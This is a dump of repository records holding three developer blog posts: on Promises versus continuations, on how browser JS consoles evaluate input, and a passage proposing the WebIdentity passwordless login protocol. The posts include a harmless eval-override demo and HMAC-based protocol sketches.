catch, and putting the error in an additional parameter, is enough. The error cascades with everything else. That way, we can even have a (potentially valid) value, along with an error.\n\n----\n\nLet's look at the Promise library.\n\nMy first surprise was how similar it was to my own design. Here is the silly operation we did before, using Promise.\n\n    Promise.resolve(\"Hello world and a good day to you all!\").then(value => {\n      return new Promise(resolve => {\n        wait(() => resolve(Array.prototype.map.call(value, i => i.charCodeAt(0))));\n      });\n    }).then(value => {\n      return Promise.all(value.map(element => {\n        return new Promise(resolve =>\n          wait(() => resolve(String.fromCharCode(element + 1))));\n      }));\n    }).then(value => value.join('')\n    ).then(value => ldiv(value, Math.sqrt(value.length)).join('\\n')\n    ).then(alert);\n\nSure, it is a bit lengthier, especially the part where I used a `map` (which is surprisingly a use-case they looked at too, with `Promise.all`!) The absence of a callback in each `.then` does not bring anything more, and the Continuations library is essentially equivalent to the Promise library. Or so I thought.\n\nYou may notice this `return new Promise` pattern. Indeed, since there are no callbacks, whether you are chaining promises or not depends on whether what you return is a Promise or not.\n\nOr so I thought. Actually, it depends on whether you return a *thenable*. What is a thenable? Something with a `.then` method. Which means the values you pass through the pipe can corrupt the pipe itself.\n\n    Promise.resolve({first: ()=>1, then: ()=>5}).then(value => {\n      value.first = ()=>2;\n      return value;\n    }).then(value => alert(JSON.stringify(value)))\n\nOops, that value is accidentally a thenable. The pipe is prematurely interrupted.\n\nAnd so I looked at last week's ECMA discussions. Behold, \"Why thenables?\" was the topic du jour! That issue annoys, but it won't go away… for compatibility reasons.
The APIs of the Web were always a bit crufty. 2013 is just another year.\n\nWhile working ex-cathedra is a fun experience, I wouldn't recommend using my continuations library. The Web doesn't win because it is the best design, it wins because it is the most useful.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-12-29T19:29:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7365269660949707,
"alphanum_fraction": 0.7714186906814575,
"avg_line_length": 97.68181610107422,
"blob_id": "27d2f15483f9ec93939e14e924023abe4ba527bd",
"content_id": "4bb11eb71c3c531c278b2b10b2bf7820b49e29d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8686,
"license_type": "no_license",
"max_line_length": 769,
"num_lines": 88,
"path": "/blog/src/making-the-js-console-intuitive.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Making the JS console intuitive\n\nThe most familiar tool that DevTools put in your belt is a JavaScript console.\nAnd you know how it should work, right? Just like that Firebug console we had for so many years.\n\nExcept that most JS consoles actually suffer from what Joel Spolsky called [leaky abstraction](http://www.joelonsoftware.com/articles/LeakyAbstractions.html). Let's go through the edge-cases.\n\n**When I press ENTER**\n\nYou may wonder, what happens behind the covers, when I press Enter in the console?\n\nLet's look at *Firefox*. We have an API for [sandboxes](https://developer.mozilla.org/en-US/docs/Components.utils.Sandbox) in the browser. A sandbox has its own global object, but it is linked to what we call a compartment. For simplicity's sake, let's consider that a compartment is a web page. When we evaluate code in the sandbox, it acts just as if the page was running it, except that the page cannot access (and run code in) the sandbox itself.\n\nHowever, the duplication of global objects has undesirable side-effects.\n\n document instanceof Object // false, should be true.\n var foo = 5;\n window.foo // undefined, should be 5.\n\nThe sandbox has a distinct global object, so `var foo = 5` adds a `foo` property to its global object. However, `window` is the web page's global object, which does not see `foo`. Similarly, `document` belongs to the web page, while `Object` is attached to the sandbox.\n\nYou may think this is bad. Let me show you what *Google Chrome* [does](https://github.com/WebKit/webkit/blob/5c21b924213ce72bb53af15baca6ae31ed9542b0/Source/WebCore/inspector/InjectedScript.cpp#L70).\n\nWhat is the simplest solution you can come up with? The web page's global object already has a function to run arbitrary JavaScript. `eval()`, right? But this is a security hazard. Copy and paste this URL in your omnibar:\n\n data:text/html,<title></title><script>window.eval = function (e) { console.log('sending ' + e + ' to a malicious website!'); };</script>\n\n(Don't worry, it isn't really malicious). Open the JS console, type something in.\n\nWhy do you get everything you enter sent to a malicious website (not really)? Because the web page redefines `eval()` to be whatever they want, along their sinister agenda.\n\n(This has been [filed](https://bugs.webkit.org/show_bug.cgi?id=96559), and it has been fixed in Chromium.)\n\nI have to say, *Opera*'s implementation seems spotless. None of the issues raised above are to be found. They [call](https://github.com/operasoftware/dragonfly/blob/master/src/repl/repl_service.js#L419) an `Eval` binding which is documented [here](http://operasoftware.github.com/scope-interface/EcmascriptDebugger.6.14.html#Eval), and which takes care of all possibilities (running the code in the stack frame when the debugger is on a breakpoint, etc.) without getting disturbed if the web page modifies the `eval()` function. Magic!\n\n**Special cases ($0 and friends)**\n\nThe set of all special variables and functions you get in the JS console is what Firebug calls the Command Line API.\nIt has [some kind of spec](http://getfirebug.com/wiki/index.php/Command_Line_API). It is a plain simple documentation of their behaviour, written in Fall 2009. When Google Chrome started their own DevTools, they copied a lot of the behaviour that Firebug had, and the same goes for Opera Dragonfly. 
Thus far, that spec has been very uncontroversial.\n\nOnly recently did Paul Irish suggest changing `$()` from the old `document.getElementById` (inherited from prototype.js) [to](https://docs.google.com/spreadsheet/viewform?formkey=dHA5RjFzbF9tcElCa3VXYm13ZTctdkE6MQ) [a](https://bugzilla.mozilla.org/show_bug.cgi?id=778732) [more](https://bugs.webkit.org/show_bug.cgi?id=92648) [intuitive](https://plus.google.com/113127438179392830442/posts/Bo1zdF4X9mp) (jQuery-inspired) `document.querySelector`. Everybody liked the idea; it got re-implemented everywhere (I contributed the Opera Dragonfly [change](https://github.com/operasoftware/dragonfly/pull/53)).\n\n*Opera* calls them [Host commands](https://github.com/operasoftware/dragonfly/blob/cf46806f747067825c66142a6869c54b36f17d68/src/repl/commandtransformer.js#L237). As you can tell from looking at their code, they replace the matched token that their parser gives them with a string of JS code.\nFor example, `$` is first parsed as a token, which is replaced on the fly with `\"(typeof $ == 'function' && $ || function(e) { return document.getElementById(e); })\"`. Then, all tokens get concatenated, and evaluated. The simplest monkey-patching can do the trick.\n\n(They even take care of recursive commands, by re-flowing the post-processed code through their tokenizer, although I don't believe they actually use recursive host commands!)\n\nWhile Opera's host commands operate just like pre-processor macros, *Firefox* injects [all those special functions](http://hg.mozilla.org/integration/fx-team/file/5650196a8c7d/browser/devtools/webconsole/HUDService-content.js#l518) into [the sandbox's global object](http://hg.mozilla.org/integration/fx-team/file/5650196a8c7d/browser/devtools/webconsole/HUDService-content.js#l1005).\n\nFinally, *WebKit* has the most infamous solution of all. As you may have noticed while trying the \"malicious\" web page, upon entering the following code in the console:\n\n    (function() { debugger; }())\n\n… a new script called `(program)` will pop up in the debugger and show [the following content](https://github.com/WebKit/webkit/blob/5c21b924213ce72bb53af15baca6ae31ed9542b0/Source/WebCore/inspector/InjectedScriptSource.js#L448):\n\n    with ((window && window.console && window.console._commandLineAPI) || {}) {\n        (function() { debugger; }())\n    }\n\nYou can probably guess what `window.console._commandLineAPI` contains. It's an object that maps identifiers like `$` and `$$` to defined functions.
Evaluating `console._commandLineAPI.$.toString()` yields \"function () { [native code] }\": yep, all those functions are native, all written in C++.\n\nWe don't really see a performance impact from the use of the with statement, but injecting all window variables, console variables, and the command line API, using this frowned-upon construct, feels wrong in some subconscious way.\n\n*Firebug* [defines real functions](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L1050), and then tries to do [the right thing](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L274), inserting the API [into the JS frame](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L274) if available, but [it ends up not doing anything with it](https://github.com/firebug/firebug/blob/master/extension/content/firebug/js/debugger.js#L84), which explains why you don't get to use `$` and friends in the console while on a breakpoint.\n\nThe backup plan [will sound familiar](https://github.com/firebug/firebug/blob/af1d74102de2cd2f2f9202f18d1d4c02439aa16a/extension/content/firebug/console/commandLine.js#L180).\n\n    expr = \"with(_FirebugCommandLine){\\n\" + expr + \"\\n};\";\n\n\n**Future changes**\n\nIn order to erase the issues I talk about in Firefox's WebConsole, we are working on a tighter integration with our Debugger. You can read all about it on [this lengthy thread](https://bugzilla.mozilla.org/show_bug.cgi?id=774753). The basic idea is, instead of a sandbox, use the debugger to run code dynamically, while adding bindings (the command line API) that are not accessible from the web page. Shout out to Jim Blandy for adding [this functionality](https://bugzilla.mozilla.org/show_bug.cgi?id=785174) to the Debugger recently.\n\nObviously, there is more work to be done. We are careful about not making this change cause performance regressions or security problems. No rush, but we are on the right path!\n\n**Wrapping up**\n\nWe arrive at the end of our journey. All in all, tool developers have proven very ingenious, twisting every part of the JS language to meld it to their needs. However, the resulting disparate toolboxes can have rough, incompatible edges (think Opera's host commands, `$` and `$$` for example, which cannot be used as function references).\n\nYet, this is one of the most functional cross-browser APIs I have ever seen. The magic happens by discussing your implementation with fellow tool hackers. Thank you, Internet!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n  \"@type\": \"BlogPosting\",\n  \"datePublished\": \"2012-09-12T23:20:00Z\",\n  \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7623023986816406,
"alphanum_fraction": 0.7726215124130249,
"avg_line_length": 56.71084213256836,
"blob_id": "121e68c26bd0a9d7f282654ef067b357eeb3fd02",
"content_id": "38e41caa39fdc5096e0cb0677d9db2e9d3dc2932",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33676,
"license_type": "no_license",
"max_line_length": 945,
"num_lines": 581,
"path": "/blog/src/webidentity.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# WebIdentity: One-click passwordless signups & logins\n\nI talked about [best-practices for password-based logins last time][MemorablePasswords],\nand gave tools to help you follow them.\n\nPassword managers (and generators) must become prevalent.\nThankfully, it is becoming a reality: beyond services such as 1password or Dashlane,\nbrowsers themselves now offer those features built-in.\nIt sprouted from the bookmark sync feature, became password sync,\nand now has suggested random passwords.\n\nBut **passwords are inherently flawed** as a security user experience.\nHonestly, they slow down both registration to a new service, and logins.\nIt annoys users, allows terrible security practices, and \nloses businesses billions yearly, both on users that give up,\nand reputation from security issues.\n\nThere is a high cost to websites to implement and maintain security practices\naround password storage.\nBy the way, this is the most significant example of “roll your own crypto”,\nas each website defines its own authentication protocol.\n\nThere is also a cost for browsers: maintaining a list of passwords,\none for each website, makes for a fairly large total storage.\nA significant, pernicious consequence is the emergence of siloes,\nencouraging browser monopolies:\nwhy would I switch browsers, when it is so hard to copy all those passwords over?\n\nMy hope for the future of authentication:\n\n- Become so seamless that **both signing up and logging in is a single click**.\n- We want that improved UX, not just with the same security level that we have now, but a much better one.\n - An attacker that got its hands on a fresh plaintext copy of the website’s database and secrets should be unable to authenticate on behalf of users.\n - Even if someone can decrypt traffic on-the-fly, from seeing the authentication information, they also can’t impersonate the user for more than 30 seconds afterwards.\n - Even with both a full-on breach of the website’s servers *and* on-the-fly traffic decryption, they cannot sign up nor log in as you.\n- And, cherry on top, we want to do so in such a way that *exporting identities between browsers and devices is extremely easy*.\n\nI called this new scheme **WebIdentity**.\n\n## The place of WebAuthn\n\nYour mind may be itching to yell: “WebAuthn!”\nSo, before digging into the gritty details of WebIdentity,\nlet’s talk about the awesomeness that is WebAuthn.\n\n[WebAuthn][] is an authentication scheme that relies on public-key cryptography.\n\nA phenomenal advantage of WebAuthn over WebIdentity is\nin the ability to leverage a wide range of different security devices\n(Yubico, TouchID, Windows Hello, and so many more).\nIn short, it is *absolutely amazing* at second-factor authentication (2FA),\nwhich is completely outside the scope of WebIdentity and would complement it beautifully.\n\nHowever, WebAuthn has severe disadvantages for use as main authentication,\nwhich WebIdentity solves wonderfully.\nBetting on WebAuthn as the main sign-up and log-in system\nrisks significantly delaying the wide adoption\nof passwordless authentication on the Web:\n\n- Websites do not implement it because:\n - on the backend, it requires them to implement a PKI, which is an endeavor.\n Multiple public keys can map to the same user, and management of the keys\n (and of the certificate validation upon sign-up, when necessary) needs proper handling.\n - on the front-end, it requires subtle cryptography to handle the challenge handshake,\n that needs to be implemented not just 
for the Web, but for iOS and Android apps.\n With WebIdentity, there is no front-end change at all.\n- **Feature detection** is involved. Both the front-end and the backend must know\n that the user can do WebAuthn on that device, and ideally, the backend stores it\n on secure httpOnly cookies. It also must store the list of credential IDs:\n there could be multiple users on the same device.\n WebIdentity relies on the user management feature already built into the browser’s Sync.\n- For websites, it requires a **database access** for each authentication.\n That contributes to a requirement to only use WebAuthn for login, not session authentication.\n WebIdentity does both in one fell swoop, and database interaction is only needed for sign-ups and logins.\n- More damningly, the protocol requires a back-and-forth;\n in other words, it cannot be used directly for all HTTP requests.\n It needs a separate, **unspecified session key management scheme** such as JWT.\n With WebIdentity, the user authentication scheme is indistinguishable from\n the session authentication scheme.\n- Most damningly, **exporting the public/private key pairs between browsers** was not part of the design process.\n In fact, synchronizing those keys (some of which can change) between browsers is a complex operation.\n It goes so far that the [official recommendation from browser makers][Apple] is to never have WebAuthn log-in\n be the only log-in mechanism, because private keys are tied to the device.\n Changing (or losing) devices require logging in through another means.\n Thus, it is only a faster log-in process (click login, select identity, accept request, enter biometrics or press Yubikey button)\n than passwords, but passwords remain the main log-in weak link that won’t die.\n Meanwhile, WebIdentity has a faster log-in still (there is literally just the click login step),\n and can fully replace passwords.\n- To roll it out slowly, it started being **used only as 2FA**.\n It is now usually tied to things like Yubikey in the UX,\n and seems doomed to remain only used for 2FA,\n as a consequence of everything listed above.\n- WebAuthn suffers from **crypto-agility**, similar to JWT where it caused security faults.\n In WebIdentity, algorithms are set for each version,\n and version changes are only performed when the previous algorithm is broken.\n Since there is really only one cryptographic algorithm, it is easy to keep track of.\n- In the same vein, it is easy for a service operator to **misuse** WebAuthn,\n and end up losing major security protections. 
There are many subtle traps.\n For instance, they may generate challenges with a poor random source,\n or forget to validate some metadata field received.\n- Where is the **NFC antenna** on this phone?\n- Public-key cryptography is currently at risk from **quantum computing** advances,\n whereas WebIdentity relies on primitives that are essentially [quantum-resistant][].\n\nAll in all, WebAuthn is harder for website operators to put in place than passwords,\nwhile WebIdentity is simpler.\n(Although they would only do so once all major evergreen browsers implement it.)\n\nThe status quo: despite browsers’ efforts to add support not just for Yubikeys but also TouchID,\nwebsite owners are very shy in implementing support even just for 2FA,\nin part because of the implementation complexity,\nand the user experience is frustrating enough currently that few actually use it.\nI do not know any independent commercial website\nthat uses WebAuthn as its primary log-in system, instead of passwords.\n\nWebIdentity can quickly replace password authentication with a much simpler system,\nboth for users, website operators, and browsers;\nwhile WebAuthn is likely to have a slow, 10-year adoption across websites.\n\nHowever, WebIdentity does not replace WebAuthn!\nWebAuthn is still extremely valuable as 2FA,\nwhich should really be used on all sensitive actions on the website.\n\n## Initialization\n\nFirst, the browser stores a single random 256-bit secret for each user,\ncalled the **Browser Key (BK)**,\nsynchronized across all devices through its Sync feature.\nThat key never leaves the browser’s Sync servers.\n\nEach website keeps around a random 256-bit secret key (**Website Key, WK**)\nidentified by a **key ID (KID)**,\ntypically a number incremented every time the key needs to change,\nwhich should be rare, eg. 
yearly.\nIt must be generated by a CSPRNG, for instance from /dev/urandom.\n\n## Sign-Up\n\nWhen going on a page, the website advertises that it supports WebIdentity\nby delivering this header (even on 200 status results):\n\n    WWW-Authenticate: Identity v1\n\nUpon seeing it, the browser displays a “Log in” button *in its chrome*\n(above the [line of death][], thus not in the webpage),\nif the website uses TLS and HSTS.\n\nWhen the user clicks it, from then on, for all HTTPS requests to that website,\nthe browser will authenticate the user to the website,\nand display a “Log out” button instead of the “Log in” one.\n\nBut first, there is a tiny sign-up handshake.\nTo begin, the browser computes the **User’s Website Key (UWK)** as the MAC\nof the effective Top-Level Domain [eTLD+1][PublicSuffix]:\nit is unique for each entity that has control over a given cookie space,\nand incidentally will also soon be [the only URL part shown][RegistrableDomain] (to fight phishing).\nSo the security UX will be consistent for identity and website trust here.\nThe UWK MAC is keyed with BK, the user’s Sync secret kept by the browser.\nThe UWK is a *secret that the browser has for each user and each website*.\nIt is never stored and only transmitted between the browser’s Sync servers\nand the user’s browser upon sign-up and login.\n\nThen, the browser takes a MAC of the ASCII string “AUID”, keyed with UWK:\nthis becomes the **Authentication User ID (AUID)**\nwhich will *identify the user in each HTTP request*.\nEavesdroppers cannot find the UWK from it, which is good,\nsince it is only used for very rare, sensitive operations.\n\nFinally, the browser picks a **Log-In Date (LID)** to send as an HTTP header,\nand computes its MAC, keyed with the User’s Website Key (UWK).\nThe result is the **Log-In Proof token (LIP)**,\na piece of information kept secret by the browser,\nwhich will be later revealed to the website when logging back in,\nto strongly prove that the initiator is the initial user.\n\n
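As a minimal Python sketch (the helper names are mine; only the token names come from the spec, and in reality the BK-keyed steps happen on the browser’s Sync servers), those derivations look like this:\n\n    import base64, hashlib, hmac\n\n    def mac(key, message):\n        # Every MAC in v1 of the protocol is HMAC-SHA256.\n        return hmac.new(key, message, hashlib.sha256).digest()\n\n    def b64url(raw):\n        # Unpadded base64url, the encoding used for all tokens on the wire.\n        return base64.urlsafe_b64encode(raw).rstrip(b'=').decode()\n\n    def sign_up_tokens(bk, etld1, lid):\n        uwk = mac(bk, etld1.encode())  # User's Website Key\n        auid = mac(uwk, b'AUID')       # Authentication User ID\n        lip = mac(uwk, lid.encode())   # Log-In Proof, kept secret\n        liv = mac(lip, auid)           # Log-In Verification\n        return b64url(auid), b64url(liv), lip\n\n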
Aside: as you can imagine, there will be a whole tree of hashes,\neach with a different purpose and name.\nTo help you follow along, here is a picture of the entire tree:\n\n\n\nThe browser reloads the page with the Date header set to the LID,\nand the following new header\n(all in one line, with spaces instead of newlines; the newlines are for readability):\n\n    Authorization: Identity v1 SignUp\n        auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        liv=\"7deoyUWH9wk-x15mb-vr7i57rU0VojDLwc99EjtKUlUK\"\n\n- `Identity` indicates that it uses this authorization scheme.\n- `v1` is the version of the scheme; it likely would change very rarely, typically when the hash function gets broken.\n- `SignUp` is the action: here, we sign up as a new user.\n- `VzX3…` is the Authentication User ID (AUID), which the website will rely on to identify the user.\n- `7deo…` is the **Log-In Verification token (LIV)**,\n  a MAC of the AUID keyed with the Log-In Proof token (LIP).\n- The LID is sent in the Date header so that the website can store it.\n\nThe website cannot guess the LIP, nor can any eavesdropper,\nwhich is good, since the LIP will be used to prove knowledge of BK\nfor rare, sensitive updates.\n\nThe website identifies the user from the AUID (indirectly),\nbut it cannot guess the user’s AUID for another website.\nBesides, two websites cannot know that their respective AUIDs correspond to the same user\nwithout seriously endangering the security of their own authentication.\nThat protects the user’s privacy across websites.\n\nUpon receiving a SignUp request,\nthe website takes a MAC of the AUID, keyed with WK (the website’s secret key).\nThat is the **Website’s User Key (WUK)**, a secret kept by the website, unique to a user.\nIt is roughly the opposite of the User’s Website Key (UWK).\nThe user cannot know the website’s other users’ WUK,\nsince it would need both their BK and the WK to do so.\n\nThen, the website computes the **User ID (UID)** as the MAC of the AUID\nkeyed with its Website’s User Key (WUK).\nThe UID will be stored in database, etc.\nIntruders cannot find the AUID nor the WUK from read-only access to the database,\npreventing them from crafting fake authenticated requests.\n\nThen it does the following:\n\n1. It verifies that the LID is within one minute of its known date. If not, the sign-up is denied.\n2. It stores in database the UID, the LID, and the LIV, likely with a mapping to its internal user identifier.\n   In our example, the UID is `XvP5sxmrh8UmpgYqJ9OmKs9HqhxcdS5-lUxlaEuhBc4`.\n\nThen, the website prepares a response.\n\nFirst, it constructs the **Log-In Shared Key (LISK)**\nas the MAC of the Log-In Date (LID) keyed with the Website’s User Key (WUK).\nThat key will be *shared between the website and the browser* for one hour,\nand will be used to compute a TOTP.\n\nIf the website sees that the user was already signed up,\nit will accept it, but with slight differences in the response\nthat are discussed in the Log In section.\nOtherwise, it returns a page with the following header:\n\n    WWW-Authenticate: Identity v1 Key\n        kid=\"2020\"\n        auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        lisk=\"Ii6JLfnbWJgcy0WtworWKRIlJIPSGkQwSAvBtQM1OEgK\"\n\n- `Key` is the action instructing the browser to store the website’s key.\n- `2020` is the KID, placed first to ease inspection.\n- `VzX3…` is the AUID, identifying the user in all future requests.\n- `Ii6J…` is the LISK, which will be used to prove that the user is who they claim to be for one hour.\n\n(The website can also send identifying data,\nsuch as its internal ID (eg. a username or its database’s generated `user_id`),\nin a payload encrypted with the WUK as key,\nin the Cookies header, ideally Secure and httpOnly.\nThat lets it avoid a database fetch when it relies on an internally-produced ID\ninstead of the UID provided by WebIdentity.\nThat part is outside the definition of WebIdentity, however.)\n\nThe browser stores the version (v1), the KID, the LID and the LISK in its Sync feature.\n\n## Authentication\n\nOn each HTTP request while logged in, the browser sends the AUID,\nalong with a MAC of the Date HTTP header keyed with the LISK:\n\n    Authorization: Identity v1 Auth\n        kid=\"2020\"\n        auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        lid=\"Fri, 03 Jul 2020 10:11:22 GMT\"\n        totp=\"YrrliECBpS34lKob4xMOIKgM5zw8_zxMsBBleIIfGHIK\"\n\n- `Auth` is the action to authenticate the request.\n- `2020` is the KID in use.\n- `VzX3…` is the AUID, as returned from the SignUp response.\n- The Log-In Date (LID) lets the website compute the LISK.\n- `Yrrl…` is the **Time-based One-Time Password (TOTP)**:\n  the MAC of the Date (`Fri, 03 Jul 2020 14:32:19 GMT`), keyed with the LISK.\n\nWhen receiving an Auth request, the website must:\n\n1. Verify that the Date sent is within one minute of the accurate date. The request is denied otherwise.\n2. Verify that the Log-In Date (LID) is not more than one hour old.\n   The request is denied otherwise: the browser always knows to make a LogIn request (seen below) instead.\n   (Note that it does not matter if the LID does not match the stored LID.\n   That way, multiple browsers can share the same BK and still authenticate in parallel.)\n3. Compute the MAC of the request’s AUID, keyed with the WK. That is the WUK.\n4. Compute the MAC of the LID, keyed with the WUK. That is the LISK.\n5. Compute the MAC of the Date, keyed with the LISK. Verify that it matches the TOTP. The request is denied otherwise.\n6. Compute the MAC of the request’s AUID, keyed with the WUK: that is the UID, which can be used for application purposes.\n\nNote that this computation does not require database access, and is quite efficient in software.\n\n
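A minimal Python sketch of those six steps, reusing `mac` and the `hmac` import from the sketch above (the helper name and error handling are illustrative only):\n\n    from datetime import datetime, timedelta, timezone\n    from email.utils import parsedate_to_datetime\n\n    def verify_auth(wk, auid, lid, date, totp):\n        # Returns the UID on success, None on denial.\n        now = datetime.now(timezone.utc)\n        if abs(now - parsedate_to_datetime(date)) > timedelta(minutes=1):\n            return None                    # 1. Date too far from ours\n        if now - parsedate_to_datetime(lid) > timedelta(hours=1):\n            return None                    # 2. LID too old: log in again\n        wuk = mac(wk, auid)                # 3. Website's User Key\n        lisk = mac(wuk, lid.encode())      # 4. Log-In Shared Key\n        if not hmac.compare_digest(mac(lisk, date.encode()), totp):\n            return None                    # 5. TOTP mismatch\n        return mac(wuk, auid)              # 6. UID\n\nAs the spec requires, the TOTP comparison is constant-time.\n\n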
The explanation of the main principle of operation is already finished.\nLet’s look at a few events that may occur,\nranging in order from uncommon (monthly?) to extremely rare (every 20 years?).\n\n### Log Out\n\nWhen logged in, the browser’s Log In button changes to a Log out button.\n\nWhen clicking the Log out button,\nthe browser deletes the protocol version, KID, AUID and LISK in Sync;\nand no longer sends Authorization headers.\n\nThe browser logs out and logs back in automatically every hour,\nto ensure it does not use the same LISK for too long.\nBecause of the way log-outs and log-ins work,\nthis is entirely seamless and invisible to the user.\n\n### Log In\n\nWhen the browser tries to log in, in fact, it starts by simply doing the sign-up procedure.\n\nThe website detects that a sign-up already occurred, and initiates the login procedure:\n\n    WWW-Authenticate: Identity v1 LogIn\n        lid=\"Fri, 03 Jul 2020 10:11:22 GMT\"\n\nAfter the LogIn keyword, you can find the Log-In Date (LID) that the website registered for this UID.\n\nThe browser’s Sync server computes the User’s Website Key\n(UWK, a MAC of the eTLD+1 keyed with BK),\nand keys with it a MAC of that LID.\nThat gives it the Log-In Proof (LIP) that was created during sign-up.\n\nJust as with a normal sign-up,\nthe browser picks a new **Log-In Date (LID)** to send as an HTTP header,\nand computes its MAC, keyed with the User’s Website Key (UWK).\nThe result is a brand-new **Log-In Proof (LIP)**.\n(In our example, the new LID is `Fri, 03 Jul 2020 15:27:43 GMT`.)\n\nIt then sends a LogIn request,\nwhich is essentially identical to the SignUp request, but with the new LIV:\n\n    Authorization: Identity v1 LogIn\n        auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        olip=\"8x8HgKzEl5nok-JNwT2PCiwnfwrCD2rOxtMTUotU4hgK\"\n        liv=\"S4GFp0Xh8rSeV9-VgpNTCW2iDPd36sABZrGPqwj8oJkK\"\n\n- `VzX3…` is the Authentication User ID (AUID).\n- `8x8H…` is the old Log-In Proof (LIP).\n- `S4GF…` is a new **Log-In Verification token (LIV)**,\n  a MAC of the AUID keyed with the Log-In Proof (LIP).\n- The LID is sent in the Date header, so that the website can store it.\n\nThe website constructs the WUK as the MAC of the AUID keyed with its WK,\nand gets the UID as the MAC of the AUID keyed with the WUK.\nThen it validates the following:\n\n1. The LID must be within one minute of its known date.\n2. The old LIV must be the one associated with this UID as stored in database.\n3. Computing the MAC of the AUID keyed with the old LIP transmitted in the request,\n   yields the old LIV stored in database.\n\nIf the validation fails, the LogIn request is denied.\nThen, if all validated OK, it updates in database the sign-up Date and the new LIV.\n\nYou may notice that neither the website,\nnor any eavesdropper with full read access to the website,\ncould guess the LIP until they see it in the Log In request.\nThus, they could not perform a Log In request;\nand when they see it in the HTTPS payload, it is too late to take advantage of it,\nas the LIV is updated with a new one for which they don’t have the LIP.\n\nThe rest goes exactly like a Sign Up:\n\n    WWW-Authenticate: Identity v1 Key\n        kid=\"2020\"\n        auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        lisk=\"zhgoQXVsATIUd-S2mB1gUlKi5yj_iO7K7KrsI_H8rBEK\"\n\n- `Key` is the action instructing the browser to store the website’s key.\n- `2020` is the KID, placed first to ease inspection.\n- `VzX3…` is the AUID, identifying the user in all future requests.\n- `zhgo…` is the Log-In Shared Key (LISK), which will be used to prove that the user is who they claim to be.\n\nThe browser stores the version (v1), the KID, the new LID and the LISK in its Sync feature.\n\n
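The pivotal check is validation step 3: only someone who knows the UWK (and hence the BK) could have produced an old LIP whose MAC over the AUID equals the stored LIV. As a one-line Python sketch, with `mac` and `hmac` as in the sketches above:\n\n    def lip_matches_liv(old_lip, auid, stored_liv):\n        # Only the BK holder could have produced this old_lip.\n        return hmac.compare_digest(mac(old_lip, auid), stored_liv)\n\n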
### Website key update\n\nIf the website worries its key may be compromised, it will rekey.\nHowever, it must keep all past keys, and accept all of them,\nso that users can authenticate even years after the last request.\n\n(The main point of rekeying is to migrate users to a key\nthat is not compromised, such that they don’t run the risk of being\nimpersonated if the website has further severe security failures.)\n\nOnce rekeyed, when the website receives an Auth request with an old key,\nit authenticates the request with the corresponding key and accepts the request,\nbut responds with a new Key action, similar to a sign-up:\n\n    WWW-Authenticate: Identity v1 Key\n        kid=\"2021\"\n        auid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        lisk=\"zhgoQXVsATIUd-S2mB1gUlKi5yj_iO7K7KrsI_H8rBEK\"\n\nWhen receiving this, the browser updates its KID and LISK in its Sync storage for the website.\nIt then uses the new LISK on future authentications.\n\nAs long as the website only performs the rekeying after they regained full access\nand ensured that their TLS connections were not (or no longer) compromised,\nthis sensitive transmission of a LISK should not be eavesdropped.\nAfter rekeying, they can therefore safely communicate to all customers\nthe need to log out and log back in.\n\n### Browser export\n\nBrowsers must provide a way to export the Browser Key to another browser.\nIt is recommended that the browser export format be encrypted with the user’s master password.\nAdditionally, any export event should be authenticated with a second factor.\n\nFrom just the BK, the new browser can perform the Log In procedure on all websites.\n\n### Account takeover or Browser Sync breach\n\nWhen a user’s BK is leaked, the website owner (if customer service detects an account takeover)\nor browser (in the case of a breach of their Sync service)\nwill instruct the user to trigger the **Browser Key Reset procedure**.\n\nThe browser must have a button in its UI (for instance, in the Sync Preferences page) triggering the procedure:\n\nFirst, it will create a new BK (say, `0dP_ocrzSwieAuLUNCD6P660HLLOGl9zyfxYwdSLI0kK`),\nbut keep the old BK around.\n\nThen, for each website for which the user has a LISK associated to the old BK,\nthe browser will make a ReSignUp request, very similar to
